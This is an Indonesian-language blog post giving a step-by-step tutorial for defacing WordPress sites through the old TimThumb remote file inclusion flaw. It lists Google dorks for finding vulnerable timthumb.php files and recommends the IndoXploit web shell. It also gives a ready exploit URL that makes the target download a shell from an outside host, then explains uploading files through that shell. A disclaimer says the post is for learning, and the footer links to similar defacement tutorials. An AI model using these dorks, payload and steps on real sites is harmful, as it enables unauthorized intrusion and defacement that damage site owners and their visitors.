Lorem ipsum dolor sit amet, consectetur adipiscing elit. Test link

Deface Metode ThimThumb Exploit Wordpres

1 min read
Deface Metode ThimThumb Exploit Wordpres

Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode ThimThumb Exploit Wordpres

Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja

-Dork
inurl:/wp-content/themes/deepfocus/timthumb.php
inurl:/wp-content/themes/infores/timthumb.php
inurl:/timthumb.php site
Kembangin aja agar dapat yg vuln

-Exploit
thimthumb.php
tum.php
thumb.php DLL
-Exploit Upload shel
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php 
Baiklah langsung saja kita mulai

1. Kembangkan dork di atas, bagian timthumb ubah aja menjadi tum atau thumb agar dapat yg vuln

2. Jika sudah masukkan exploitnya seperti ini
site.co.li/[PATCH]/thumb.php
Jika vuln akan ada seperti ini
Catatan:Bug ini ada di thimthumb version 2.00 ke bawah


3. Langsung aja kita exsekusi (Upload shel) dengan cara tambahkan exploit upload shel di atas di bagian thumb.php seperti ini
site.co.li/[PATHC]/thumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php

4. Jika work akan ada md5 seperti di bawah ini, Md5 tersebut adalah shel kalian


5. Buka tab baru di browser kalian, kemudian copykan aksese shel kalian
Di sini saya hanya menggunakan uploader


6. Upload shel kalian


Mungkin itulah sedikit penjelasan mengenai "Deface Metode ThimThumb Exploit Wordpres"
Jika kurang paham kalian bisa bertanya di bawah ini

Jika kurang paham nonton aja video di bawah ini


Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb

You may like these posts

  • S9Y Serendipity 2.0.4 Cross Site Scripting (XSS) Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa) Terimakasih telah berkunjung ke web sederhanan ini. Heh…
  • Tutorial Bug Heartbleed Exploitation SSL (Security Ghost) Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa) Terimakasih telah berkunjung ke web sederhanan…
  • Deface Metode Dropzone CSRF Assalamualaikum Wr.Wb Baiklah kembali lagi dengan saya Mr.Adewa Pada kali ini saya akan memberikan Tutorial Deface Deface Metode Dropzone CSRF Se…
  • DotNetNuke - Administration Authentication Bypass Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa) Terimakasih telah berkunjung ke web sederhanan ini. He…
  • Deface metode Webyep System Infos Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa) Terimakasih telah berkunjung ke web sederhanan ini. Hehe Kali ini saya…
  • Ckeditor ImageUploader By XenUx_404 -Bayz21 Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa) Terimakasih telah berkunjung ke web sederhanan ini. Hehe Kal…

Post a Comment